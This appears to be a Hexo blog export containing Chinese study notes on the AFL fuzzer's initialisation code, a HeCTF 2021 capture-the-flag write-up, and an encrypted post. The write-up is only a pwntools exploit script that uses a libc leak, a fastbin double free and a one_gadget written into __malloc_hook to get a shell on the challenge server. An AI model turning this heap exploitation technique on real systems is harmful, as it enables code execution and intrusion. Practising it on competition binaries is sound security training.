<li><p>如果环境变量参数中用了-M或者-S,则改变了sync_id的值,会进入到该函数中</p>
<ul>
<li><code>sync_dir = out_dir</code></li>
<li><code>out_dir = out_dir/sync_id</code></li>
</ul>
</li>
<li><p>如果参数中没有-M</p>
<ul>
<li>等同于输入了参数-d</li>
<li><code>skip_deterministic = 1</code>。跳过确定性阶段</li>
<li><code>use_splicing = 1</code>。重新组合输入文件</li>
</ul>
</li>
</ul>
<h2 id="save-cmdline"><a href="#save-cmdline" class="headerlink" title="save_cmdline"></a>save_cmdline</h2><p>将命令行参数保存到全局变量<code>orig_cmdline</code>中</p>
<h2 id="fix-up-banner"><a href="#fix-up-banner" class="headerlink" title="fix_up_banner"></a>fix_up_banner</h2><p>修剪并且创建一个运行横幅。与参数-T相关</p>
<h2 id="check-if-tty"><a href="#check-if-tty" class="headerlink" title="check_if_tty"></a>check_if_tty</h2><p>检查是否在tty终端上运行</p>
<ul>
<li>读取环境变量是否存在AFL_NO_UI,存在则<code>not_on_tty = 1</code></li>
<li>通过函数<code>ioctl(1, TIOCGWINSZ, &ws)</code>读取window size,如果报错为ENOTTY,则代表当前不在一个tty终端运行,<code>not_on_tty = 1</code></li>
</ul>
<h2 id="get-core-count"><a href="#get-core-count" class="headerlink" title="get_core_count"></a>get_core_count</h2><p>获取cpu核心数量。保存在全局变量<code>cpu_core_count</code>中</p>
<h2 id="bind-to-free-cpu"><a href="#bind-to-free-cpu" class="headerlink" title="bind_to_free_cpu"></a>bind_to_free_cpu</h2><p>构建绑定到特定核心的进程列表</p>
<h2 id="check-crash-handling"><a href="#check-crash-handling" class="headerlink" title="check_crash_handling"></a>check_crash_handling</h2><p>如果系统配置为将核心转储文件(core)通知发送到外部程序,会导致将崩溃信息发送到Fuzzer之间的延迟增大,进而可能将崩溃被误报为超时,所以我们得临时修改core_pattern文件</p>
<p>就是第一次运行时报错让你去执行的那句话(echo core > /proc/sys/kernel/core_pattern)就是因为这个函数</p>
<h2 id="check-cpu-governor"><a href="#check-cpu-governor" class="headerlink" title="check_cpu_governor"></a>check_cpu_governor</h2><p>检查CPU管理者</p>
<h2 id="setup-post"><a href="#setup-post" class="headerlink" title="setup_post"></a>setup_post</h2><p>加载后置处理器</p>
<h2 id="setup-shm"><a href="#setup-shm" class="headerlink" title="setup_shm"></a>setup_shm</h2><p>设置 <code>trace_bits</code> 和 <code>virgin_bits</code></p>
<ul>
<li><p>如果<code>in_bitmap = 0</code>,则通过<code>memset(virgin_bits, 255, MAP_SIZE)</code>初始化数组为255(0xff)。<code>in_bitmap</code>与参数-B有关</p>
</li>
<li><p>继续使用<code>memset</code>初始化:<code>memset(virgin_tmout, 255, MAP_SIZE); memset(virgin_crash, 255, MAP_SIZE);</code></p>
</li>
<li><p><code>shm_id = shmget(IPC_PRIVATE, MAP_SIZE, IPC_CREAT | IPC_EXCL | 0600);</code></p>
<ul>
<li>函数原型:<code>int shmget(key_t key, size_t size, int shmflg);</code>,用来创建共享内存<ul>
<li>第一个参数:程序需要提供一个参数key(非0整数),它有效地为共享内存段命名,shmget()函数成功时返回一个与key相关的共享内存标识符(非负整数),用于后续的共享内存函数。调用失败返回-1<ul>
<li>这里shm_id取值是IPC_PRIVATE,所以函数shmget()将创建一块新的共享内存</li>
</ul>
</li>
<li>第二个参数:size以字节为单位指定需要共享的内存容量</li>
<li>第三个参数:权限标志<ul>
<li>IPC_CREAT:如果共享内存不存在,则创建一个共享内存,否则打开操作</li>
<li>IPC_EXCL:只有在共享内存不存在的时候,新的共享内存才建立,否则就产生错误</li>
<li>0600:每一位表示一种类型的权限,比如,第一位是表示八进制,第二位表示拥有者的权限为读写,第三位表示同组无权限,第四位表示他人无权限</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li><p><code>atexit(remove_shm)</code>,注册终止函数</p>
<ul>
<li><p>注册为函数<code>remove_shm</code></p>
</li>
<li><p>```c<br>static void remove_shm(void) {<br> shmctl(shm_id, IPC_RMID, NULL);<br>}</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line"> * 函数原型:`int shmctl(int shm_id, int command, struct shmid_ds *buf);`</span><br><span class="line"> </span><br><span class="line"> * 第一个参数:shm_id是shmget()函数返回的共享内存标识符。</span><br><span class="line"> * 第二个参数:command是要采取的操作,它可以取三个值</span><br><span class="line"> * IPC_STAT:把shmid_ds结构中的数据设置为共享内存的当前关联值,即用共享内存的当前关联值覆盖shmid_ds的值。</span><br><span class="line"> * IPC_SET:如果进程有足够的权限,就把共享内存的当前关联值设置为shmid_ds结构中给出的值</span><br><span class="line"> * IPC_RMID:删除共享内存段</span><br><span class="line"> </span><br><span class="line"> * 第三个参数:buf,一个结构指针</span><br><span class="line"> </span><br><span class="line">* 如果不是`dump_mode`,则设置环境变量`SHM_ENV_VAR`的值为`shm_str`。`dump_mode`与参数-n有关</span><br><span class="line"></span><br><span class="line">* `trace_bits = shmat(shm_id, NULL, 0);`</span><br><span class="line"></span><br><span class="line"> * 第一次创建共享内存之后还不能被任何进程访问,所以需要通过shmat函数来启动对该共享内存的访问,并把共享内存连接到当前进程的地址空间</span><br><span class="line"> * 函数原型:`void *shmat(int shm_id, const void *shm_addr, int shmflg)`</span><br><span class="line"> * 第一个参数,shm_id是由shmget()函数返回的共享内存标识</span><br><span class="line"> * 第二个参数,shm_addr指定共享内存连接到当前进程中的地址位置,通常为空,表示让系统来选择共享内存的地址</span><br><span class="line"> * 第三个参数,shm_flg是一组标志位,通常为0</span><br><span class="line"> * 调用成功时返回一个指向共享内存第一个字节的指针,如果调用失败返回-1</span><br><span class="line"></span><br><span class="line">## init_count_class16</span><br><span class="line"></span><br><span class="line">路径命中次数规整。</span><br><span class="line">trace_bits是用一个字节来记录是否到达这个路径,和这个路径被命中了多少次的,即 `count_class_lookup8[256]`。</span><br><span class="line">在每次去计算是否发现了新路径之前,先把这个路径命中次数进行规整,比如把命中4~7次都统计为命中了8次。</span><br><span class="line"></span><br><span class="line">```c</span><br><span class="line">static const u8 count_class_lookup8[256] = {</span><br><span class="line"> [0] = 0,</span><br><span class="line"> [1] = 1,</span><br><span class="line"> [2] = 2,</span><br><span class="line"> [3] = 4,</span><br><span class="line"> [4 ... 7] = 8,</span><br><span class="line"> [8 ... 15] = 16,</span><br><span class="line"> [16 ... 31] = 32,</span><br><span class="line"> [32 ... 127] = 64,</span><br><span class="line"> [128 ... 255] = 128</span><br><span class="line">};</span><br></pre></td></tr></table></figure></li>
</ul>
</li>
</ul>
<p>而在实际的规整过程中是一次规整两个字节,即<code>count_class_lookup8[65536]</code></p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="function">EXP_ST <span class="keyword">void</span> <span class="title">init_count_class16</span><span class="params">(<span class="keyword">void</span>)</span> </span>{</span><br><span class="line"> u32 b1, b2;</span><br><span class="line"> <span class="keyword">for</span> (b1 = <span class="number">0</span>; b1 < <span class="number">256</span>; b1++) </span><br><span class="line"> <span class="keyword">for</span> (b2 = <span class="number">0</span>; b2 < <span class="number">256</span>; b2++)</span><br><span class="line"> count_class_lookup16[(b1 << <span class="number">8</span>) + b2] = </span><br><span class="line"> (count_class_lookup8[b1] << <span class="number">8</span>) |</span><br><span class="line"> count_class_lookup8[b2];</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h2 id="setup-dirs-fds"><a href="#setup-dirs-fds" class="headerlink" title="setup_dirs_fds"></a>setup_dirs_fds</h2><p>设置输出目录和文件描述符。</p>
<ul>
<li>如果sync_id存在<ul>
<li>创建sync_dir文件夹</li>
</ul>
</li>
<li>创建out_dir文件夹<ul>
<li>调用<code>maybe_delete_out_dir</code>,返回文件句柄out_dir_fd<ul>
<li><code>out_dir_fd = open(out_dir, O_RDONLY);</code><ul>
<li>以只读的模式打开</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li>创建queue文件夹<ul>
<li>创建<code>out_dir/queue</code></li>
<li>创建<code>out_dir/queue/.state/</code></li>
<li>创建<code>out_dir/queue/.state/deterministic_done</code></li>
<li>创建<code>out_dir/queue/.state/auto_extras</code></li>
<li>创建<code>out_dir/queue/.state/redundant_edges</code></li>
<li>创建<code>out_dir/queue/.state/variable_behavior</code></li>
</ul>
</li>
<li>如果sync_id存在<ul>
<li>创建<code>out_dir/.synced</code>文件夹</li>
</ul>
</li>
<li>创建<code>out_dir/crashes</code>文件夹</li>
<li>创建<code>out_dir/hangs</code>文件夹</li>
<li>创建<code>out_dir/hangs</code>文件夹</li>
<li>通常有用的文件描述符<ul>
<li><code>dev_null_fd = open("/dev/null", O_RDWR);</code>,读写模式</li>
<li><code>dev_urandom_fd = open("/dev/urandom", O_RDONLY);</code>,只读模式</li>
</ul>
</li>
<li>创建Gnuplot输出文件<ul>
<li>以只写模式打开<code>out_dir/plot_data</code>文件</li>
<li>写入<code>\# unix_time, cycles_done, cur_path, paths_total, pending_total, pending_favs, map_size, unique_crashes, unique_hangs, max_depth, execs_per_sec\n </code></li>
</ul>
</li>
</ul>
<h2 id="read-testcases"><a href="#read-testcases" class="headerlink" title="read_testcases"></a>read_testcases</h2><p>从输入文件中读取testcases,排成队列用于测试</p>
<ul>
<li>尝试访问<code>in_dir/queue</code>文件夹,如果存在,重新设置<code>in_dir = fn;</code></li>
<li></li>
</ul>
]]></content>
<categories>
<category>笔记</category>
</categories>
<tags>
<tag>fuzz</tag>
</tags>
</entry>
<entry>
<title>hectf_2021</title>
<url>/article/hectf_2021/</url>
<content><![CDATA[<h1 id="HeCTF2021"><a href="#HeCTF2021" class="headerlink" title="HeCTF2021"></a>HeCTF2021</h1><!-- 文章页 配置 -->
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="comment"># context.arch = 'i386'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">2</span></span><br><span class="line">filename = <span class="string">'flexible'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'123.56.242.200 '</span>,<span class="number">10004</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line"><span class="comment"># libc = elf.libc</span></span><br><span class="line">libc = ELF(<span class="string">"./libc-2.23.so"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'choice >>'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">index,size,name,content</span>):</span></span><br><span class="line"> cmd(<span class="number">1</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'Choice your index >>'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> p.sendlineafter(<span class="string">'size >>'</span>,<span class="built_in">str</span>(size))</span><br><span class="line"> p.sendlineafter(<span class="string">'what is your name >>'</span>,<span class="built_in">str</span>(name))</span><br><span class="line"> p.sendlineafter(<span class="string">'Input your context >>'</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line"> cmd(<span class="number">2</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'Choice your index >'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> p.sendlineafter(<span class="string">'Input your context >>'</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">3</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'Choice your index >'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">4</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'Choice your index >'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x70</span>,<span class="string">'a'</span>,<span class="string">'b'</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">0x70</span>,<span class="string">'a'</span>,<span class="string">'b'</span>)</span><br><span class="line">add(<span class="number">2</span>,<span class="number">0x50</span>,<span class="string">'a'</span>,<span class="string">'b'</span>)</span><br><span class="line">add(<span class="number">3</span>,<span class="number">0x50</span>,<span class="string">'a'</span>,<span class="string">'b'</span>)</span><br><span class="line">add(<span class="number">4</span>,<span class="number">0x50</span>,<span class="string">'a'</span>,<span class="string">'b'</span>)</span><br><span class="line">add(<span class="number">5</span>,<span class="number">0x50</span>,<span class="string">'a'</span>,<span class="string">'b'</span>)</span><br><span class="line">add(<span class="number">6</span>,<span class="number">0x50</span>,<span class="string">'a'</span>,<span class="string">'b'</span>)</span><br><span class="line"></span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">main_arena_addr = u64(p.recvuntil(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)) -<span class="number">88</span></span><br><span class="line">malloc_hook = main_arena_addr - <span class="number">0x10</span></span><br><span class="line"></span><br><span class="line">libc_base = malloc_hook - libc.sym[<span class="string">'__malloc_hook'</span>]</span><br><span class="line">system_addr = libc_base + libc.sym[<span class="string">'system'</span>]</span><br><span class="line">free_hook = libc_base + libc.sym[<span class="string">'__free_hook'</span>]</span><br><span class="line">realloc = libc_base + libc.sym[<span class="string">'realloc'</span>]</span><br><span class="line"></span><br><span class="line">fake_fast_addr = free_hook - <span class="number">0x13</span></span><br><span class="line">fake_fast_addr = malloc_hook - <span class="number">0x23</span></span><br><span class="line"></span><br><span class="line">one_16 = [<span class="number">0x45226</span>,<span class="number">0x4527a</span>,<span class="number">0xf03a4</span>,<span class="number">0xf1247</span>]</span><br><span class="line"></span><br><span class="line">one_gadget = libc_base + one_16[<span class="number">1</span>]</span><br><span class="line"></span><br><span class="line">free(<span class="number">3</span>)</span><br><span class="line">free(<span class="number">4</span>)</span><br><span class="line">free(<span class="number">3</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">3</span>,<span class="number">0x50</span>,p64(fake_fast_addr),<span class="string">''</span>)</span><br><span class="line">add(<span class="number">4</span>,<span class="number">0x50</span>,p64(fake_fast_addr),<span class="string">''</span>)</span><br><span class="line">add(<span class="number">5</span>,<span class="number">0x50</span>,p64(fake_fast_addr),<span class="string">''</span>)</span><br><span class="line">add(<span class="number">6</span>,<span class="number">0x50</span>,<span class="string">''</span>,<span class="string">''</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">payload = <span class="string">'\x00'</span>*<span class="number">0xb</span> + p64(one_gadget) + p64(realloc + <span class="number">14</span> )</span><br><span class="line">edit(<span class="number">6</span>,payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">log.success(<span class="string">'libc_base: '</span> + <span class="built_in">hex</span>(libc_base)) </span><br><span class="line">log.success(<span class="string">'main_arena_addr: '</span> + <span class="built_in">hex</span>(main_arena_addr)) </span><br><span class="line">log.success(<span class="string">'malloc_hook: '</span> + <span class="built_in">hex</span>(malloc_hook)) </span><br><span class="line">log.success(<span class="string">'system_addr: '</span> + <span class="built_in">hex</span>(system_addr)) </span><br><span class="line">log.success(<span class="string">'free_hook: '</span> + <span class="built_in">hex</span>(free_hook)) </span><br><span class="line">log.success(<span class="string">'fake_fast_addr: '</span> + <span class="built_in">hex</span>(fake_fast_addr)) </span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># add(6,0x20,'a','b')</span></span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
</entry>
<entry>
<title>Hexo_build</title>
<url>/article/Hexo_build/</url>
<content><![CDATA[<div class="hbe hbe-container" id="hexo-blog-encrypt" data-wpm="Oh, this is an invalid password. Check and try again, please." data-whm="OOPS, these decrypted content may changed, but you can still have a look.">
<script id="hbeData" type="hbeData" data-hmacdigest="d65fc150bda30a4734b955a9fd802d46c486f50d8feb33e497007c2d4881feba">10d79030e8222445804370796b90fca1b3149e2c2a0f36d6b4ea04e548758c212f8223fc63b8042cf01da1253218a75f75ea6f095928ef71a6be1a1e558de7db286d67e214500a4f2bc4dea514a73e615166196eba6bb744ba0f84bc35704eb1d2374d1580a3590e945026dd20287cecea7b48f724ed143952d4a5a70e31f888435431ddf1e4f77671fe2d9e86e54ae760803c812dac7058f7309302f673ddf33340081500d89717b0936fd7f2aa987e235b4b18b56354470a52ab6fed5854055d42d58af2e077bbb775438abb3b8bd6a39f6adbd4d1c99cac354587fa9da49ffab2af201ef615792f1bdb2b9f2adaed24745ccdc1f204c89e00cb062ae602d9fccf42857780ea4b5e2faab27087caf17cd28138bb13ee59b3195ccda4325cd1b52491ebe9792517a2735e9f5f8ee9ab5502fc05b9950f85d4497721fd927ae1aa98dae3604a8a9f8a034e59ba2d7b44e1ba47ecbd8cdb9a9f66bb9185456ef8f5b63571f40cf0ba239ff5d3ea57e86045e2d36e22c4848e5a7b0632a9806f27e6a641b6fb14fee9026df5f9bfcc440aac680577bf786252a02d9d02a78c1b84178995055876d318874f3cd77cf377377697c1f2edfbd9fc1043d5aa0b0e631b34379278d798db059cc2341e70ac4ab151a3a5156b6100c1f8ec6064aa328c49c47dbbe9c068abf238eed3354f8ae9831dea9c85129181bd596f4ae79cfc56291fbae2fe78b3c8f48cd78edd414f3667df1919d3d95f41043798162a4808fecf0ad7e3ef22cef078414c2e3330f6385343bb04ec2b8a177aedfc09bd8096634af536b7ac5acfe570fe793d879b4ee4b09734ee7f7aeb1967f5ebe7af540211400720132ceb4539cf48e0f626eb5824d13bbbe266ac57bf84678610494ee2fb6a1f8c6e68a8e764706f883fd6309b85b212b3b5fa63d7b47b859ed854e93feb89cb2485f3bd15e9058aae8978ce1b1f26950a2b5a0f86f3dac32e657a197733b7df3aeb1f71ad9af5ec5de4a074ff3224969121eeb764c421112119f6c4073de1cafc6f75eca8319e11b3a374338b7af807c7032a57ec66ac89823e9462787fcafcb7a881185222b8af40fdf87ec40988e5d5cd275f68e89e492e16edd0ca676c956f4f47adfcd0b7a542db4cb18a76e6296d054d9cbbf7c922f5e7f0255a35f6d41ff50cc3eb695675105ceafa3fd6bba3cd31d08262382d000e652f9b6452fafdc458e5d33165ca67e442b36326c638f39820c9034d95a6919de0c93837b11490b62550fe41dbc1b712a37fd9ad83179f623dc81f8a77eebf987eb2a14a99ea86453fa315977e20d82ca63daa9b203e745bf3487882e7a21efe73e3705630f7628adcfbefc5f15a3b75581d9f0767aeb7963d7531e9fad40f70d63e843adf9cadb267e9023f24af8381214c9030acf5eda38ac783c6cc54eeb7709d8ef0a56e626c0d1c1a969d0df91a34e0076ff5398a6ca5acf7091001a9cc3a0da57b05e83bdf5872818010e6527e0da3dd53f2fc99f421aa69bcba3ae343d3c9faa12665962e963785aca7c7695feeca27471af08b8ad05c055bb5f6125e2968e78d4de9c313de871c35d6a4b87e768b237a02eb591456376ee4112cdf902f9adecc6b74411d3ed394bf24898e0c6c0da545b782a8dded584f37155ebf1851ac83e5216aa95c16e67b473fe4d604141a6d1d91d628fdd46f3add3ca2a51f334020901f1bdb604270e486086197c8709be5b90baa2c62105f3e2c777858fc4eb40ab714c8cd4adea96ff1c69ab027724699f6ba84965822d2d491f1cd6785e8fd975cc515b4705be41684b7e3b077e4907b1e4883376c6bb37e30026d25bdd7f6262af5d7bd4d25ba0221ff741c8aca4c9913d90cafb525d67c4aa2abb5536c635768758f6bf7880640af8f24d752f58caae58d37d8262f636cd48ea9f10a09bc43487ceb73cf3ab404457e9c90a90fb82094a06e87364ce433a44ec77269494aef59cc5e86af7d84c1dc015b9426197fd34118675c0692a9f4dcb870af486d7fe4a7938d1aaaa90c893826a69cd5bc7b7b0b2dfd2ed38178dac80412bcf548a12842b83d68d12f5c227989078774006c59a7f03086d24f0ae4bc585923db199039d9867bfb4e571562cdb4cd255ca59e0172dbf7c4d7a0a395c02061dc3fc41ad6b8d56f36538bdce73c84fef4686016d201c1dc9a9b4d09e0b309397e70674a14c6a36cab536dd3dfaccf312f6b799a9a1a49d17ea35a0f766beb179f273f92d7eec1bd66b77e0f563328522f837a1c10ef053116befd830d892273b7ee74a1d45eadbc61736c88d0bffa2d7a163db9bf19f0002a8e49f4e5d7366cd4d2c425636b037430d9098949f5fb197900a49be6109fbf11f76e04f5060476da838b8561715fef10716a8c4cfe69515921457de9ca9a5a1e56ddad6d265fce6779efe771bf56ce9c0e5e876cf23c7edf81489c2b3f150a1d374048973b1fbea0bc110ce396acbe73886bbc57c492658a140043479aa8d2335611b4d233d7a43d22f45555dd2e7a5cc2f07962dbf9f1317d0f2fcd606e2d2fc3d5911082c50d5a2d9f7a94bfd779d3339767539a9a36cafbb28394ea3ccf621031ce7484ac0f5d9601c89115e4dbb24fad038b7f552f016e1d5ba008df12ddefcdd3159e91e62739f73b1f7994f2d6f22e5277810051f100e19d49582b79441b839689e878c6c563211d7061f4f9657fd4f9d26629b83bf0c58d6be183921d53dd2a4afed0bc97cc8423de71f1977f103e87eb1808fea3396a67b1bd7dde3889da518050c8ef4fcd836000f17cdf5fb880ef834c5e97e1bfa5e7d3eefa5a13f2f896bca568fdf3b8b2e107e0ba4154ebf3662fd5367359fda3222eabe4b8f8d530de3aa91588309a038985eed7afcf80a5d92861b0dfac20a533505e4f1e98fa44e19a10a69465a4f7fcf8defede39081bbbc21f2678685321365f6d36843aa0297eb43c71514074e86315bf76004f3717e95c4dbc3c66c48e0693c10d3ce4c8cde3b6a52a46fb45c9e885bfeb9d4cba314b00ff8a535dc1ce32a9648b953f6e54e25917072b38a6c1e73402635b639ea232541ffaae607a7f81c5b087a1f61b1337e5562321be3dfea8bf6c3ae40b0413799e7b9129e4958536437b78c462cbb0281b4bd53a848ec67688a9e9aebf699a888b93bdf2c741dcd549d3864b2f7898e45ef9ead07425c0ed55d9b7ac1a3e6042d5254b8a38639c362bf34fd9e150648ddf5a9d39abf59a9f03d5eee763a34c75bfb63f90f1056f57cb86d74e49471b8fc18950d0108809c59b8e1a03d02cc69914d13c6377a332ca17770b99725f27ca383a5eb01243e98b2f07a4e2df72e8cf1459126da5cfa5838f028fbbf9c85d3261a321dd04186b2d6b2027f381e207036dfa28ab143efade75934efaf87c7c365e3405a95a626c02c2c7d14ed5ee2d63d4aba6f70d0ff646139acdeb925c4880bc723e4e25d35a3e8a1c1d927667e448724fb515a7f1e9800886cd5d78bc009833231a21453dc7bdd2b850e2d1d72d976eab91fc8f7176ad36008bacac06ce577b99a11bca762d7dab369154a5fba173a3155168770c0bb332a91b6768044b7a86fa9a6783e9c5f1144337f0e19ff434193525c4f99de4176e558ed5bac51e282c04f0a1af573309c3e9d084e92d3bf706c329596811513e3dad5c9e6ffe7da7129918ba9968a648a10be9364a4dee99dfee380cf85ee8d1192eb92cb5c0f9c507b1309184731e0f71d96f898abab4dd744145f8d7bec17653bfbb2f9c93ba8539c6b67dac9743f129c252c661ef9f8ebbeb08596905e4b4e745d393463319f3547d97ecebf416045aa03ab69707f074d2fbf7fafc6b286f672b3736835c2c2a77ed0e058dea4cdf2ce93a8e66459a33cc5fe8b05bfbde68a3d6580fe5a856ea68fcd355584fe66b6771db2336246ec17f36b8dd4dac7bf4417bd1811c8646b56644b7570de5456502c811d2dfbea48270f94af71424085a54e9cefa07547a9237950952d458c1ec665b180610f2d5ac691febbc6041373e675a93b9785ec7e7113b89f91501f8c94859c27cd135622962f6695083acceaf0c9061352d513673ae43ba6ea35543d4fde2fbd5b7f487460096626ae60c506f4f46cae7bc500c3bb94056abc8df0f471d02d35cdef492f6eb47896768b32ed8968bec31cc7c76d7fb6db8fb51270788cbfeef9bcb4709385a99278ecd067ed4e6269f37d117c0b1f20465e89754c578f0ff471a381cc50ac756271968a9b6cd924161f90b036e4bb30905918200102319d9adfadbd5dcb7c613b1081009778551a7fdb63ad6bf69c96230fe13c4224679c078e99e5a3fe639638edf18e8eda7138ee3d8c4eba92ca4601b2f4aa969b53647773b44ed420f305f9603fd7f401e32e2792d8a0d90233efa93527c9fe7aba1966ad7cbd0b8dd1d0f31f09cfd560163b7fb21eb26b25afa553b7695d643d88d03d3fa5b392fddee4c1d1583cf8e8784cf9120f6781b82e661ac5aff5468c47a3ec0fd80e5eda172175c9bc018077f5cdd97d4d2ce169c487f564b0384353b30de30d49d7b8af0af546488a47b5a7642599961ab3839c778fa5be8b9f8794a811b41f921e3c62842351649b31f8878734be2869f6a1427f7d0b68e3424c4b7e900b431d17e8b2f303a5da748c0331b876e45f987312c7790505d20aa520ad0fbede088bbd4b1d9765e9f807c6cd37b0e8defdab5b73e8c6b991b00aec0026e53f15952115183c65b68b3d77c8a9ced7b1f7d416a2d6712587081fdb48555ebd0fa1052613f54d06776c6f234361bb909da9f3dc52f97e14bce1bcfe78a92b8c6e7c051a8f52d7a460fd91d34efed80f7051fdd9e172cc60f28340e17487d25eb90ffa1721f988c5d78501f51ad5ec041ca60afefa1e287b66e4fef9fa48869878d75d4f43cf77f61bd51f0cc806b82a03c891ee24994cdca1ca18ad9ddda8df92073c64acea92838ee66440bae87c0d46c5cf97270e8cefc3b3f9e2ade68d38df39fb26e1bed7b3ffc8a2c079c9d81a6994cc1ee9ec1b9ef46dd0d07701f6d705111f7615d14d15338539645c6358b3ad3483b775a24274f0001de1a063505313cecfba7396d6647c030090f55d24841065dd80990eee429615d514abf9c54af788af80b6d037db48aea8ccba5ae420a1e70fa2eb392e822136a31d6685cda21fa5e93d95a20340c09daeebdaedf51d486b68767b2650ab8b002716b6c812d6e4a75e9629d479c3e11efc9e32cd2ed5e9dda6ebc653548a39cc178553af5d1377e0df33a49f6ed494e64b1131a1095bf9beb0b6360efb138b691bb2c1b3e245ab6460645c6431057b35e2b519f04ddf467b5d5dfa788b3d06c74e52e5668ac0fd0e90b0958c6b55f2a916a02ed399ef634c55f1ea368a5e14005f56d365606748974414d9e54ef247db0d362b5f285a45d6998212f643979dc5778e6f599db2f22c867b326639aa73d9c750e98d4dce093bd17ba3ba4e9fe6fce0e37900f472b7157377ef4477b7b18de6ec3c27629dbd4bc83719ca0c402588c768072f712a8e1bce4652e4db2665f92191e02f6c4dc036c176e4f4e2869d44afa3987260f092ef79a5c1e8fd206385eecf97b10df408a3851889d30657a597564494a7570e3a4b3c0f94ee52c08a2bc941f46fb565258a662ae99bd5482741a583c19ec8c099d7539262921d75eb03a9ef06374b2d66b98982b11550e57a0a973449d89cb3036544a7d43523cd6f055bdd9ff02ae45536009a1ee139c3fba6a0101f5317432a5b88e05a5590151c1cd7a8d1d4bfc6b11e79d1941321f42fdb060259d730c2f8b654af6ea5c32a9ce3ec9aba72d3c98dc155906127ed69e1a6a20a07174fe7c53e99db12ac812d9cc31cb7928319e4c067898afbbc19af198e6612bf13607be81a2e30a3df63d79e6c9744e3a662dc221e749b986fd60d085ec14d472b0091396acf13c9e575fc1eb1aae8cc0169e31c0e3789d6f5f8e4f8324aa2898e2a7b375c86a420c47a8c31a5cdcfa19fb31752f2d0ff32d0a6d176f835bcfc8c66650dea45dbb672d09d452bfc1c95dfe547e028738584fdc0f44be72a31a211e13fa51d1bcdb800922a78e8569c9bf49b62893e262ad5e30930c3aa8d948c4fe937972cd4b6dcc752b901efdf70e6e2e8f0a03ddfdd9194bbc3892823e60e0e69c18d10f7677c502c2f052f5b32ead184bdda4e3f9a1eebd383e3fcb4beb6ce67217158f32ea3026abf02626bf23b43e9912b19f628ec16dc82c1ce35ec17f045a0af4c0288085acd2fbffba50e4235ef82addc7b79ce9b47fe393cf9a98d5c3e4404acdce81580de0d7850ad72914b6478592897dab93545d7dd8c6610fc87590dcbcd94f7181619e7e9af1ccb72a985919421e96265262c4f6b3ad7c1e0afa98befe4d7dd6155181a55f213e98634fbac9f679612c0c87840aad027b96addd534fdecc32a7c26a9c675b0b44204c1d82873f4079a5436e09c85d4f179543f20484bd072dafdc11930a2dece7d92cecaa654ab4da57979d8b3efcf0f1d3f1d7fef4bfc090194b9a4365d5fe43ebab75997a36598297c34c8574fab5b3daa6139316d566e46a3cdab441a210822149f9695ab6b38e1501b788517025dd7f574652ab62e82e9cbdbdb7108c3d8ebfe073dc9f3f20e73f83df8b71d094736b6e05abae35c0eaec8bc6c223c9f9d6bdb5de166283283d07686574e42888a961cf0dbb5405bbfe1927074722f713ad9df077af5f4c5c